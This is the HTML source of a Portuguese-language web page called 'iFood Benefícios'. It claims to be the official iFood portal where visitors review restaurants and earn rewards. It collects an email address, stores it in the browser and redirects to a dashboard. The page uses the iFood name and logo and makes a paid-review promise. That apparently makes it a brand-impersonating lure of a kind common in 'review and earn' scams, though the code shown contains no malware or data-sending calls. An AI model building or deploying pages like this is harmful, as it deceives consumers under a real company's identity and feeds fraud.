<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    
    <!-- Preload da logo -->
    <link rel="preload" as="image" href="images/ifood-creditos-logo.jpeg">
    
    <!-- CSS -->
    <link rel="stylesheet" href="css/d0507d7869aaf463.css">
    
    <!-- Favicons -->
    <link rel="icon" href="images/favicon.ico" sizes="any">
    <link rel="icon" href="images/favicon-16x16.png" type="image/png" sizes="16x16">
    <link rel="icon" href="images/favicon-32x32.png" type="image/png" sizes="32x32">
    <link rel="apple-touch-icon" href="images/apple-touch-icon.png">
    
    <!-- Meta tags -->
    <title>iFood Benefícios - Avalie restaurantes e ganhe recompensas</title>
    <meta name="description" content="Avalie restaurantes parceiros do iFood, responda perguntas simples e ganhe recompensas por cada avaliação completa.">
    <meta name="author" content="iFood Benefícios">
    <meta name="keywords" content="iFood,avaliação,restaurantes,recompensas,ganhe dinheiro,opinião,benefícios">
    
    <!-- Open Graph -->
    <meta property="og:title" content="iFood Benefícios - Avalie restaurantes e ganhe recompensas">
    <meta property="og:description" content="Avalie restaurantes parceiros do iFood, responda perguntas simples e ganhe recompensas por cada avaliação completa.">
    <meta property="og:type" content="website">
    <meta property="og:locale" content="pt_BR">
    
    <!-- Fonts -->
    <link rel="preload" href="fonts/e4af272ccee01ff0-s.p.woff2" as="font" crossorigin="" type="font/woff2">
</head>
<body>
    <div class="flex flex-col min-h-screen bg-gray-100">
        <main class="flex-1 flex items-center justify-center p-4">
            <div class="w-full max-w-md">
                <div class="text-center mb-8">
                    <!-- Logo com dimensões adequadas para imagem 1024x1024 -->
                    <img 
                        alt="iFood Benefícios" 
                        width="150" 
                        height="150" 
                        decoding="async" 
                        class="mx-auto mb-6 rounded-lg shadow-sm" 
                        style="color:transparent; object-fit: contain;" 
                        src="images/ifood-creditos-logo.jpeg"
                    >
                    <h1 class="text-gray-700 text-xl font-semibold mb-3">
                        Seja bem-vindo ao portal de avaliações oficial!
                    </h1>
                    <p class="text-gray-600 text-base mb-8">
                        Digite seu e-mail e comece a avaliar nossos restaurantes parceiros.
                    </p>
                </div>
                
                <form class="space-y-6" action="/dashboard" method="GET">
                    <div>
                        <input 
                            type="email" 
                            name="email"
                            class="flex w-full rounded-lg border border-gray-300 bg-white px-4 py-3 text-base placeholder:text-gray-500 focus:outline-none focus:ring-2 focus:ring-[#EB2834] focus:border-transparent transition-colors" 
                            id="email" 
                            placeholder="seu@email.com" 
                            required 
                            pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,}$" 
                            title="Por favor, insira um endereço de e-mail válido"
                        >
                    </div>
                    <button 
                        class="w-full bg-[#EB2834] hover:bg-[#d91e2a] text-white font-bold py-4 px-6 rounded-lg text-base transition-colors duration-200 focus:outline-none focus:ring-2 focus:ring-[#EB2834] focus:ring-offset-2" 
                        type="submit"
                    >
                        COMEÇAR A AVALIAR
                    </button>
                </form>
            </div>
        </main>
        
        <footer class="bg-white p-4 text-center text-gray-500 text-sm border-t">
            © 2025 iFood Benefícios. Todos os direitos reservados.
        </footer>
    </div>
    
    <!-- Scripts essenciais -->
    <script>
        // Redirecionamento após envio do formulário
        document.querySelector('form').addEventListener('submit', function(e) {
            e.preventDefault();
            const email = document.getElementById('email').value;
            if (email) {
                localStorage.setItem('userEmail', email);
                window.location.href = '/dashboard';
            }
        });
    </script>
</body>
</html> 